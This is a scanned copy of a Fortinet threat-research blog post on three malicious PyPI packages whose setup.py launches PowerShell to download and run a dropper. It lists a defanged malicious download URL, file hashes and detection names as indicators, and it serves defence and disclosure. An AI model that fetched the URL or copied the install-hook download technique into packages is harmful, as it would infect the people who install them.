www.fortinet.com
Open in
urlscan Pro
54.177.212.176
Public Scan
URL:
https://www.fortinet.com/blog/threat-research/supply-chain-attack-using-identical-pypi-packages-colorslib-httpslib-libhttps
Submission: On January 18 via api from DE — Scanned from DE
Submission: On January 18 via api from DE — Scanned from DE
Form analysis 1 forms found in the DOM
GET /blog/search
<form class="b3-searchbox__form" action="/blog/search" method="get">
<input class="b3-searchbox__input" type="text" name="q" placeholder="Search Blogs">
<button class="b3-searchbox__icon" aria-label="Search" type="submit">
<svg viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg">
<path
d="M15.688 14.18l-4.075-4.075C12.36 9.06 12.8 7.78 12.8 6.4 12.8 2.87 9.93 0 6.4 0 2.87 0 0 2.87 0 6.4c0 3.53 2.87 6.4 6.4 6.4 1.38 0 2.66-.44 3.705-1.187l4.075 4.075c.207.208.48.312.753.312.274 0 .547-.104.755-.312.416-.417.416-1.093 0-1.51zM2.133 6.4c0-2.357 1.91-4.267 4.267-4.267s4.267 1.91 4.267 4.267-1.91 4.267-4.267 4.267S2.133 8.757 2.133 6.4z"
fill="#fff">
</path>
</svg>
</button>
</form>Text Content
Blog
* Categories
* Business & Technology
* Threat Research
* Industry Trends
* Partners
* Customer Stories
* PSIRT Blogs
* Business & Technology
* Threat Research
* Industry Trends
* Partners
* Customer Stories
* PSIRT Blogs
* CISO Collective
* Subscribe
Threat Research
SUPPLY CHAIN ATTACK USING IDENTICAL PYPI PACKAGES, “COLORSLIB”, “HTTPSLIB”, AND
“LIBHTTPS”
By Jin Lee | January 14, 2023
The FortiGuard Labs team has discovered a new 0-day attack embedded in three
PyPI packages (Python Package Index) called ‘colorslib’, ‘httpslib’, and
“libhttps”. They were found on January 10, 2023, by monitoring an open-source
ecosystem. The Python packages “colorslib” and “httpslib” were published on
January 7, 2023, and “libhttps” was published on January 12, 2023. All three
were published by the same author, ‘Lolip0p’, as shown in the official PyPI
repository. ‘Lolip0p’ joined the repository close to the publish date.
Figure 1: Package author information
The author puts the project description that may look legitimate and clean as
shown below.
Figure 2: Project description of colorslib
Figure 3: Project description of httpslib
Figure 4: Project description of libhttps
All versions of these packages are malicious.
Figure 5: Release history of colorslib
Figure 6: Release history of httpslib
Figure 7: Release history of libhttps
Interestingly, when we look at the setup.py script for these packages, we find
they are identical.
Figure 8: setup.py from all packages
They try to run a PowerShell with a suspicious URL that needs further analysis:
https://dl[.]dropbox[.]com/s/mkd3enun97s8zag/Oxzy[.]exe?dl=0
As shown in the VirusTotal entry below, the download URL includes the following
binary exe (SHA 256):
8dc8a9f5b5181911b0f4a051444c22e12d319878ea2a9eaaecab9686e876690b
While this download URL has not previously been detected by any other threat
researchers, some vendors do flag the downloaded executable file as malicious.
Figure 9: This URL has not been detected by VirusTotal
Figure 10: Vendors that detect the downloaded executable Oxzy.exe
The downloaded executable is called ‘Oxyz.exe’. It drops another executable,
‘update.exe’, that runs in the folder ‘%USER%\AppData\Local\Temp\’
Figure 11: Dropped file update.exe
As shown in the VirusTotal entry below, several vendors flag this binary exe as
malicious (SHA 256):
293a3a2c8992636a5dba58ce088feb276ba39cf1b496b336eb7b6f65b1ddb757
Figure 12: Vendors that detect the dropped executable update.exe
When running ‘update.exe’, it drops a series of files to the folder
‘%USER%\AppData\Local\Temp\onefile_%PID_%TIME%’.
Figure 13: update.exe running
Figure 14: Dropped files
The dropped file, ‘SearchProtocolHost.exe’, is flagged as malicious by several
vendors (SHA 256):
123fd1c46a166c54ad66e66a10d53623af64c4b52b1827dfd8a96fdbf7675638
Figure 15: Vendors that detect SearchProtocolHost.exe
CONCLUSION
In this blog, we showed a single author posting separate Python packages that
use the same code to launch an attack. The author also positions each package as
legitimate and clean by including a convincing project description. However,
these packages download and run a malicious binary executable.
Python end users should always perform due diligence before downloading and
running any packages, especially from new authors. And as can be seen,
publishing more than one package in a short time period is no indication that an
author is reliable.
FORTINET PROTECTIONS
FortiGuard AntiVirus detects the malicious executables identified in this report
as
Oxzy.exe: Malicious_Behavior.SB
update.exe: PossibleThreat.PALLASNET.H
SearchProtocolHost.exe: Malicious_Behavior.SB
The FortiGuard AntiVirus service is supported
by FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running current
AntiVirus updates are protected.
The FortiGuard Web Filtering Service detects the download URLs cited in this
report as Malicious and blocks them.
IOCS
Oxzy.exe
8dc8a9f5b5181911b0f4a051444c22e12d319878ea2a9eaaecab9686e876690b
update.exe
293a3a2c8992636a5dba58ce088feb276ba39cf1b496b336eb7b6f65b1ddb757
SearchProtocolHost.exe
123fd1c46a166c54ad66e66a10d53623af64c4b52b1827dfd8a96fdbf7675638
Malicious URLs
https://dl[.]dropbox[.]com/s/mkd3enun97s8zag/Oxzy[.]exe?dl=0
Learn more about Fortinet’s FortiGuard Labs threat research and global
intelligence organization and Fortinet’s FortiGuard AI-powered Security Services
portfolio. Sign up to receive our threat research blogs.
Tags:
threat research, security attack, python
RELATED POSTS
Threat Research
POSSIBLE NEW BADPATCH CAMPAIGN USES MULTI-COMPONENT PYTHON COMPILED MALWARE
Threat Research
SUPPLY CHAIN ATTACK VIA NEW MALICIOUS PYTHON PACKAGE, “SHADERZ” (PART 2)
Threat Research
NEW SUPPLY CHAIN ATTACK USES PYTHON PACKAGE INDEX “AIOCONSOL”
*
*
*
*
*
*
NEWS & ARTICLES
* News Releases
* News Articles
SECURITY RESEARCH
* Threat Research
* FortiGuard Labs
* Threat Map
* Threat Briefs
* Ransomware Prevention
CONNECT WITH US
* Sharepoint (FUSE)
* Partner Portal
* Investor Relations
* Product Certifications
COMPANY
* About Us
* Exec Mgmt
* Careers
* Training
* Events
* Industry Awards
* Social Responsibility
* CyberGlossary
* Sitemap
* Blog Sitemap
CONTACT US
* (866) 868-3678
Subscribe
Copyright © 2023 Fortinet, Inc. All Rights Reserved
Terms of Services Privacy Policy | Cookie Settings
Also of Interest
* DOJ & Top Security Threats
* Pay Ransomware Settlements?
* Why ZTNA in the Cloud Isn't Enough
* Converging NOC & SOC starts with FortiGate
COOKIE PREFERENCE CENTER
* YOUR PRIVACY
* STRICTLY NECESSARY COOKIES
* PERFORMANCE COOKIES
* FUNCTIONAL COOKIES
* TARGETING COOKIES
YOUR PRIVACY
When you visit any website, it may store or retrieve information on your
browser, mostly in the form of cookies. Because we respect your right to
privacy, you can choose not to allow some types of cookies. Click on the
different category headings to find out more and change our default settings.
However, blocking certain cookies in the Functional category may impact your
experience of the site and the services we are able to offer. privacy policy
STRICTLY NECESSARY COOKIES
Always Active
These cookies are necessary for the website to function and cannot be switched
off in our systems. They are usually only set in response to actions made by you
which amount to a request for services, such as setting your privacy
preferences, logging in or filling in forms. You can set your browser to block
or alert you about these cookies, but some parts of the site will not then work.
Cookies Details
PERFORMANCE COOKIES
Performance Cookies
These cookies allow us to count visits and traffic sources so we can measure and
improve the performance of our site. They help us to know which pages are the
most and least popular and see how visitors move around the site.
Cookies Details
FUNCTIONAL COOKIES
Functional Cookies
These cookies enable the website to provide enhanced functionality and
personalisation. They may be set by us or by third party providers whose
services we have added to our pages. If you do not allow these cookies then some
or all of these services may not function properly.
Cookies Details
TARGETING COOKIES
Targeting Cookies
These cookies may be set through our site by our advertising partners. They may
be used by those companies to build a profile of your interests and show you
relevant adverts on other sites. They are based on uniquely identifying your
browser and internet device. If you do not allow these cookies, you will
experience less targeted advertising.
Cookies Details
BACK BUTTON BACK
Vendor Search
Filter Button
Consent Leg.Interest
checkbox label label
checkbox label label
checkbox label label
* 33ACROSS
33ACROSS
View Third Party Cookies
* Name
cookie name
Clear
checkbox label label
Apply Cancel
Confirm My Choices
Allow All
COOKIE SETTINGS
By clicking “Accept All”, you agree to use of cookies on your device to enhance
site functionality, analyze site usage, and assist in our marketing efforts. The
Cookies Settings link has cookie-specific detail and preference options. privacy
policy
Reject All Accept All
Cookies Settings